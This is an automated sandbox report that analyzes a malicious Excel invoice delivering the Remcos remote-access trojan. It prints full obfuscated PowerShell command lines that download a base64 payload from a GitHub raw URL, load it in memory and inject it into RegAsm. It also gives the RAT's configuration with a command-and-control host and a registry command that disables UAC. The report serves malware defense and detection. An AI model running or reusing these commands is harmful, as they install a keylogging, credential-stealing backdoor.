Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
invoice_45009.xls

Overview

General Information

Sample name:invoice_45009.xls
Analysis ID:1528050
MD5:43983a4a84f12dd512b7dd6e1e72dd1d
SHA1:bef63e320407ad6b5c2fba7d98e79bd0bc497ea1
SHA256:20efb5b024328037e0991db2db376723ee239c5dfa8933dd24fdcc29e7fe8256
Tags:xlsuser-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Obfuscated command line found
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Searches for Windows Mail specific files
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Excel Network Connections
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3320 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WINWORD.EXE (PID: 3616 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
      • EQNEDT32.EXE (PID: 3976 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • wscript.exe (PID: 4060 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\newsweetnesswithverynicecute.vbS" MD5: 979D74799EA6C8B8167869A68DF5204A)
      • powershell.exe (PID: 3120 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9dScrJ3InKydsID0gJysnezJ9JysnaHR0cCcrJ3MnKyc6Ly8nKydyYXcuZycrJ2knKyd0aHUnKydidXMnKydlcmNvJysnbnRlbicrJ3QnKycuJysnYycrJ29tL05vRGV0ZScrJ2N0T24nKycvTm9EZXRlY3QnKydPbi9yZWZzJysnL2hlYWRzL21haScrJ24vJysnRGV0YScrJ2hOJysnb3RoLVYudCcrJ3gnKyd0ezInKyd9OyB7JysnMX1iJysnYScrJ3NlJysnNicrJzQnKydDbycrJ24nKyd0ZW50ID0gJysnKE5ldycrJy0nKydPYicrJ2plY3QgUycrJ3knKydzJysndGVtLk5ldC5XZWJDbCcrJ2knKydlbnQpLkQnKydvJysnd24nKydsb2FkU3RyaW4nKydnKHsxfXVybCknKyc7IHsnKycxJysnfScrJ2JpbicrJ2FyeUMnKydvbnRlbnQnKycgPSBbJysnU3knKydzdGVtJysnLicrJ0MnKydvbnZlcnRdOjpGcicrJ28nKydtJysnQicrJ2FzZTY0JysnU3RyaW4nKydnKHsxfWJhc2U2NEMnKydvbnQnKydlbnQpOycrJyAnKyd7MX1hc3NlbWJseSAnKyc9JysnICcrJ1tSZWZsZWMnKyd0JysnaW9uJysnLkFzc2VtJysnYmx5XTo6TG9hZCcrJyh7JysnMScrJ30nKydiJysnaW5hcicrJ3lDb250JysnZScrJ24nKyd0JysnKTsgWycrJ2RubGliJysnLicrJ0lPLkhvbWVdOjpWQUkoezB9dHgnKyd0LlInKydFU1MnKydTRCcrJ1IvMDU0LzkuNDQuMDQnKycyLjgzJysnLy86cHR0JysnaHsnKycwfScrJywnKycgezB9ZGVzYXRpdmFkb3swfSwgeycrJzB9ZGVzJysnYXRpdmFkJysnb3swfSwgeycrJzB9ZGUnKydzJysnYScrJ3RpdicrJ2Fkb3swfSwnKycgezB9UmUnKydnJysnQXNtezB9LCAnKyd7MH17MH0nKycsezAnKyd9JysnezB9KScpLWYgIFtjaGFSXTM0LFtjaGFSXTM2LFtjaGFSXTM5KSB8IC4oICRTSEVMTElkWzFdKyRTaEVsbElkWzEzXSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • powershell.exe (PID: 2880 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}u'+'r'+'l = '+'{2}'+'http'+'s'+'://'+'raw.g'+'i'+'thu'+'bus'+'erco'+'nten'+'t'+'.'+'c'+'om/NoDete'+'ctOn'+'/NoDetect'+'On/refs'+'/heads/mai'+'n/'+'Deta'+'hN'+'oth-V.t'+'x'+'t{2'+'}; {'+'1}b'+'a'+'se'+'6'+'4'+'Co'+'n'+'tent = '+'(New'+'-'+'Ob'+'ject S'+'y'+'s'+'tem.Net.WebCl'+'i'+'ent).D'+'o'+'wn'+'loadStrin'+'g({1}url)'+'; {'+'1'+'}'+'bin'+'aryC'+'ontent'+' = ['+'Sy'+'stem'+'.'+'C'+'onvert]::Fr'+'o'+'m'+'B'+'ase64'+'Strin'+'g({1}base64C'+'ont'+'ent);'+' '+'{1}assembly '+'='+' '+'[Reflec'+'t'+'ion'+'.Assem'+'bly]::Load'+'({'+'1'+'}'+'b'+'inar'+'yCont'+'e'+'n'+'t'+'); ['+'dnlib'+'.'+'IO.Home]::VAI({0}tx'+'t.R'+'ESS'+'SD'+'R/054/9.44.04'+'2.83'+'//:ptt'+'h{'+'0}'+','+' {0}desativado{0}, {'+'0}des'+'ativad'+'o{0}, {'+'0}de'+'s'+'a'+'tiv'+'ado{0},'+' {0}Re'+'g'+'Asm{0}, '+'{0}{0}'+',{0'+'}'+'{0})')-f [chaR]34,[chaR]36,[chaR]39) | .( $SHELLId[1]+$ShEllId[13]+'X')" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • RegAsm.exe (PID: 2244 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
          • RegAsm.exe (PID: 1436 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
            • RegAsm.exe (PID: 2032 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\umamwkvoyd" MD5: 8FE9545E9F72E460723F484C304314AD)
            • RegAsm.exe (PID: 2936 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\wgfwwugimmoks" MD5: 8FE9545E9F72E460723F484C304314AD)
            • RegAsm.exe (PID: 2476 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\hispxnqjaugxdnkyl" MD5: 8FE9545E9F72E460723F484C304314AD)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "ugnrv.duckdns.org:9674:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-0BYJUE", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nicesweetthingsentiretimesheneedtogetmebackwithverynicepersonwhowillingtogetniceworthfulthingsalwaysinhandsweetnesshaveforthebiscoutwhichieatedwith____verynic[1].docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x10bf:$obj1: \objhtml
  • 0x10e4:$obj2: \objdata
  • 0x10fc:$obj3: \objupdate
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B5BBC488.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
    • 0x10bf:$obj1: \objhtml
    • 0x10e4:$obj2: \objdata
    • 0x10fc:$obj3: \objupdate
    SourceRuleDescriptionAuthorStrings
    00000013.00000002.642861861.000000000241E000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000013.00000002.642709056.0000000000BCB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000013.00000002.642581330.0000000000B75000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
              Click to see the 25 entries
              SourceRuleDescriptionAuthorStrings
              19.2.RegAsm.exe.400000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                19.2.RegAsm.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                  19.2.RegAsm.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    19.2.RegAsm.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                    • 0x6aab8:$a1: Remcos restarted by watchdog!
                    • 0x6b030:$a3: %02i:%02i:%02i:%03i
                    19.2.RegAsm.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
                    • 0x64b0c:$str_a1: C:\Windows\System32\cmd.exe
                    • 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                    • 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                    • 0x64b7c:$str_b2: Executing file:
                    • 0x65bfc:$str_b3: GetDirectListeningPort
                    • 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                    • 0x65728:$str_b7: \update.vbs
                    • 0x64ba4:$str_b9: Downloaded file:
                    • 0x64b90:$str_b10: Downloading file:
                    • 0x64c34:$str_b12: Failed to upload file:
                    • 0x65bc4:$str_b13: StartForward
                    • 0x65be4:$str_b14: StopForward
                    • 0x65680:$str_b15: fso.DeleteFile "
                    • 0x65614:$str_b16: On Error Resume Next
                    • 0x656b0:$str_b17: fso.DeleteFolder "
                    • 0x64c24:$str_b18: Uploaded file:
                    • 0x64be4:$str_b19: Unable to delete:
                    • 0x65648:$str_b20: while fso.FileExists("
                    • 0x650c1:$str_c0: [Firefox StoredLogins not found]
                    Click to see the 18 entries

                    Exploits

                    barindex
                    Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 38.240.44.9, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3976, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49172
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3976, TargetFilename: C:\Users\user\AppData\Roaming\newsweetnesswithverynicecute.vbS

                    System Summary

                    barindex
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9dScrJ3InKydsID0gJysnezJ9JysnaHR0cCcrJ3MnKyc6Ly8nKydyYXcuZycrJ2knKyd0aHUnKydidXMnKydlcmNvJysnbnRlbicrJ3QnKycuJysnYycrJ29tL05vRGV0ZScrJ2N0T24nKycvTm9EZXRlY3QnKydPbi9yZWZzJysnL2hlYWRzL21haScrJ24vJysnRGV0YScrJ2hOJysnb3RoLVYudCcrJ3gnKyd0ezInKyd9OyB7JysnMX1iJysnYScrJ3NlJysnNicrJzQnKydDbycrJ24nKyd0ZW50ID0gJysnKE5ldycrJy0nKydPYicrJ2plY3QgUycrJ3knKydzJysndGVtLk5ldC5XZWJDbCcrJ2knKydlbnQpLkQnKydvJysnd24nKydsb2FkU3RyaW4nKydnKHsxfXVybCknKyc7IHsnKycxJysnfScrJ2JpbicrJ2FyeUMnKydvbnRlbnQnKycgPSBbJysnU3knKydzdGVtJysnLicrJ0MnKydvbnZlcnRdOjpGcicrJ28nKydtJysnQicrJ2FzZTY0JysnU3RyaW4nKydnKHsxfWJhc2U2NEMnKydvbnQnKydlbnQpOycrJyAnKyd7MX1hc3NlbWJseSAnKyc9JysnICcrJ1tSZWZsZWMnKyd0JysnaW9uJysnLkFzc2VtJysnYmx5XTo6TG9hZCcrJyh7JysnMScrJ30nKydiJysnaW5hcicrJ3lDb250JysnZScrJ24nKyd0JysnKTsgWycrJ2RubGliJysnLicrJ0lPLkhvbWVdOjpWQUkoezB9dHgnKyd0LlInKydFU1MnKydTRCcrJ1IvMDU0LzkuNDQuMDQnKycyLjgzJysnLy86cHR0JysnaHsnKycwfScrJywnKycgezB9ZGVzYXRpdmFkb3swfSwgeycrJzB9ZGVzJysnYXRpdmFkJysnb3swfSwgeycrJzB9ZGUnKydzJysnYScrJ3RpdicrJ2Fkb3swfSwnKycgezB9UmUnKydnJysnQXNtezB9LCAnKyd7MH17MH0nKycsezAnKyd9JysnezB9KScpLWYgIFtjaGFSXTM0LFtjaGFSXTM2LFtjaGFSXTM5KSB8IC4oICRTSEVMTElkWzFdKyRTaEVsbElkWzEzXSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9dScrJ3InKydsID0gJysnezJ9JysnaHR0cCcrJ3MnKyc6Ly8nKydyYXcuZycrJ2knKyd0aHUnKydidXMnKydlcmNvJysnbnRlbicrJ3QnKycuJysnYycrJ29tL05vRGV0ZScrJ2N0T24nKycvTm9EZXRlY3QnKydPbi9yZWZzJysnL2hlYWRzL21haScrJ24vJysnRGV0YScrJ2hOJysnb3RoLVYudCcrJ3gnKyd0ezInKyd9OyB7JysnMX1iJysnYScrJ3NlJysnNicrJzQnKydDbycrJ24nKyd0ZW50ID0gJysnKE5ldycrJy0nKydPYicrJ2plY3QgUycrJ3knKydzJysndGVtLk5ldC5XZWJDbCcrJ2knKydlbnQpLkQnKydvJysnd24nKydsb2FkU3RyaW4nKydnKHsxfXVybCknKyc7IHsnKycxJysnfScrJ2JpbicrJ2FyeUMnKydvbnRlbnQnKycgPSBbJysnU3knKydzdGVtJysnLicrJ0MnKydvbnZlcnRdOjpGcicrJ28nKydtJysnQicrJ2FzZTY0JysnU3RyaW4nKydnKHsxfWJhc2U2NEMnKydvbnQnKydlbnQpOycrJyAnKyd7MX1hc3NlbWJseSAnKyc9JysnICcrJ1tSZWZsZWMnKyd0JysnaW9uJysnLkFzc2VtJysnYmx5XTo6TG9hZCcrJyh7JysnMScrJ30nKydiJysnaW5hcicrJ3lDb250JysnZScrJ24nKyd0JysnKTsgWycrJ2RubGliJysnLicrJ0lPLkhvbWVdOjpWQUkoezB9dHgnKyd0LlInKydFU1MnKydTRCcrJ1IvMDU0LzkuNDQuMDQnKycyLjgzJysnLy86cHR0JysnaHsnKycwfScrJywnKycgezB9ZGVzYXRpdmFkb3swfSwgeycrJzB9ZGVzJysnYXRpdmFkJysnb3swfSwgeycrJzB9ZGUnKydzJysnYScrJ3RpdicrJ2Fkb3swfSwnKycgezB9UmUnKydnJysnQXNtezB9LCAnKyd7MH17MH0nKycsezAnKyd9JysnezB9KScpLWYgIFtjaGFSXTM0LFtjaGFSXTM2LFtjaGFSXTM5KSB8IC4oICRTSEVMTElkWzFdKyRTaEVsbElkWzEzXSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe,
                    Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49172, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3976, Protocol: tcp, SourceIp: 38.240.44.9, SourceIsIpv6: false, SourcePort: 80
                    Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}u'+'r'+'l = '+'{2}'+'http'+'s'+'://'+'raw.g'+'i'+'thu'+'bus'+'erco'+'nten'+'t'+'.'+'c'+'om/NoDete'+'ctOn'+'/NoDetect'+'On/refs'+'/heads/mai'+'n/'+'Deta'+'hN'+'oth-V.t'+'x'+'t{2'+'}; {'+'1}b'+'a'+'se'+'6'+'4'+'Co'+'n'+'tent = '+'(New'+'-'+'Ob'+'ject S'+'y'+'s'+'tem.Net.WebCl'+'i'+'ent).D'+'o'+'wn'+'loadStrin'+'g({1}url)'+'; {'+'1'+'}'+'bin'+'aryC'+'ontent'+' = ['+'Sy'+'stem'+'.'+'C'+'onvert]::Fr'+'o'+'m'+'B'+'ase64'+'Strin'+'g({1}base64C'+'ont'+'ent);'+' '+'{1}assembly '+'='+' '+'[Reflec'+'t'+'ion'+'.Assem'+'bly]::Load'+'({'+'1'+'}'+'b'+'inar'+'yCont'+'e'+'n'+'t'+'); ['+'dnlib'+'.'+'IO.Home]::VAI({0}tx'+'t.R'+'ESS'+'SD'+'R/054/9.44.04'+'2.83'+'//:ptt'+'h{'+'0}'+','+' {0}desativado{0}, {'+'0}des'+'ativad'+'o{0}, {'+'0}de'+'s'+'a'+'tiv'+'ado{0},'+' {0}Re'+'g'+'Asm{0}, '+'{0}{0}'+',{0'+'}'+'{0})')-f [chaR]34,[chaR]36,[chaR]39) | .( $SHELLId[1]+$ShEllId[13]+'X')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}u'+'r'+'l = '+'{2}'+'http'+'s'+'://'+'raw.g'+'i'+'thu'+'bus'+'erco'+'nten'+'t'+'.'+'c'+'om/NoDete'+'ctOn'+'/NoDetect'+'On/refs'+'/heads/mai'+'n/'+'Deta'+'hN'+'oth-V.t'+'x'+'t{2'+'}; {'+'1}b'+'a'+'se'+'6'+'4'+'Co'+'n'+'tent = '+'(New'+'-'+'Ob'+'ject S'+'y'+'s'+'tem.Net.WebCl'+'i'+'ent).D'+'o'+'wn'+'loadStrin'+'g({1}url)'+'; {'+'1'+'}'+'bin'+'aryC'+'ontent'+' = ['+'Sy'+'stem'+'.'+'C'+'onvert]::Fr'+'o'+'m'+'B'+'ase64'+'Strin'+'g({1}base64C'+'ont'+'ent);'+' '+'{1}assembly '+'='+' '+'[Reflec'+'t'+'ion'+'.Assem'+'bly]::Load'+'({'+'1'+'}'+'b'+'inar'+'yCont'+'e'+'n'+'t'+'); ['+'dnlib'+'.'+'IO.Home]::VAI({0}tx'+'t.R'+'ESS'+'SD'+'R/054/9.44.04'+'2.83'+'//:ptt'+'h{'+'0}'+','+' {0}desativado{0}, {'+'0}des'+'ativad'+'o{0}, {'+'0}de'+'s'+'a'+'tiv'+'ado{0},'+' {0}Re'+'g'+'Asm{0}, '+'{0}{0}'+',{0'+'}'+'{0})')-f [chaR]34,[chaR]36,[chaR]39) | .( $SHELLId[1]+$ShEllId[13]+'X')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9dScrJ3InKydsID0gJysnezJ9JysnaHR0cCcrJ3MnKyc6Ly8nKydyYXcuZycrJ2knKyd0aHUnKydidXMnKydlcmNvJysnbnRlbicrJ3QnKycuJysnYycrJ29tL05vRGV0ZScrJ2N0T24nKycvTm9EZXRlY3QnKydPbi9yZWZzJysnL2hlYWRzL21haScrJ24vJysnRGV0YScrJ2hOJysnb3RoLVYudCcrJ3gnKyd0ezInKyd9OyB7JysnMX1iJysnYScrJ3NlJysnNicrJzQnKydDbycrJ24nKyd0ZW50ID0gJysnKE5ldycrJy0nKydPYicrJ2plY3QgUycrJ3knKydzJysndGVtLk5ldC5XZWJDbCcrJ2knKydlbnQpLkQnKydvJysnd24nKydsb2FkU3RyaW4nKydnKHsxfXVybCknKyc7IHsnKycxJysnfScrJ2JpbicrJ2FyeUMnKydvbnRlbnQnKycgPSBbJysnU3knKydzdGVtJysnLicrJ0MnKydvbnZlcnRdOjpGcicrJ28nKydtJysnQicrJ2FzZTY0JysnU3RyaW4nKydnKHsxfWJhc2U2NEMnKydvbnQ
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}u'+'r'+'l = '+'{2}'+'http'+'s'+'://'+'raw.g'+'i'+'thu'+'bus'+'erco'+'nten'+'t'+'.'+'c'+'om/NoDete'+'ctOn'+'/NoDetect'+'On/refs'+'/heads/mai'+'n/'+'Deta'+'hN'+'oth-V.t'+'x'+'t{2'+'}; {'+'1}b'+'a'+'se'+'6'+'4'+'Co'+'n'+'tent = '+'(New'+'-'+'Ob'+'ject S'+'y'+'s'+'tem.Net.WebCl'+'i'+'ent).D'+'o'+'wn'+'loadStrin'+'g({1}url)'+'; {'+'1'+'}'+'bin'+'aryC'+'ontent'+' = ['+'Sy'+'stem'+'.'+'C'+'onvert]::Fr'+'o'+'m'+'B'+'ase64'+'Strin'+'g({1}base64C'+'ont'+'ent);'+' '+'{1}assembly '+'='+' '+'[Reflec'+'t'+'ion'+'.Assem'+'bly]::Load'+'({'+'1'+'}'+'b'+'inar'+'yCont'+'e'+'n'+'t'+'); ['+'dnlib'+'.'+'IO.Home]::VAI({0}tx'+'t.R'+'ESS'+'SD'+'R/054/9.44.04'+'2.83'+'//:ptt'+'h{'+'0}'+','+' {0}desativado{0}, {'+'0}des'+'ativad'+'o{0}, {'+'0}de'+'s'+'a'+'tiv'+'ado{0},'+' {0}Re'+'g'+'Asm{0}, '+'{0}{0}'+',{0'+'}'+'{0})')-f [chaR]34,[chaR]36,[chaR]39) | .( $SHELLId[1]+$ShEllId[13]+'X')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}u'+'r'+'l = '+'{2}'+'http'+'s'+'://'+'raw.g'+'i'+'thu'+'bus'+'erco'+'nten'+'t'+'.'+'c'+'om/NoDete'+'ctOn'+'/NoDetect'+'On/refs'+'/heads/mai'+'n/'+'Deta'+'hN'+'oth-V.t'+'x'+'t{2'+'}; {'+'1}b'+'a'+'se'+'6'+'4'+'Co'+'n'+'tent = '+'(New'+'-'+'Ob'+'ject S'+'y'+'s'+'tem.Net.WebCl'+'i'+'ent).D'+'o'+'wn'+'loadStrin'+'g({1}url)'+'; {'+'1'+'}'+'bin'+'aryC'+'ontent'+' = ['+'Sy'+'stem'+'.'+'C'+'onvert]::Fr'+'o'+'m'+'B'+'ase64'+'Strin'+'g({1}base64C'+'ont'+'ent);'+' '+'{1}assembly '+'='+' '+'[Reflec'+'t'+'ion'+'.Assem'+'bly]::Load'+'({'+'1'+'}'+'b'+'inar'+'yCont'+'e'+'n'+'t'+'); ['+'dnlib'+'.'+'IO.Home]::VAI({0}tx'+'t.R'+'ESS'+'SD'+'R/054/9.44.04'+'2.83'+'//:ptt'+'h{'+'0}'+','+' {0}desativado{0}, {'+'0}des'+'ativad'+'o{0}, {'+'0}de'+'s'+'a'+'tiv'+'ado{0},'+' {0}Re'+'g'+'Asm{0}, '+'{0}{0}'+',{0'+'}'+'{0})')-f [chaR]34,[chaR]36,[chaR]39) | .( $SHELLId[1]+$ShEllId[13]+'X')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: 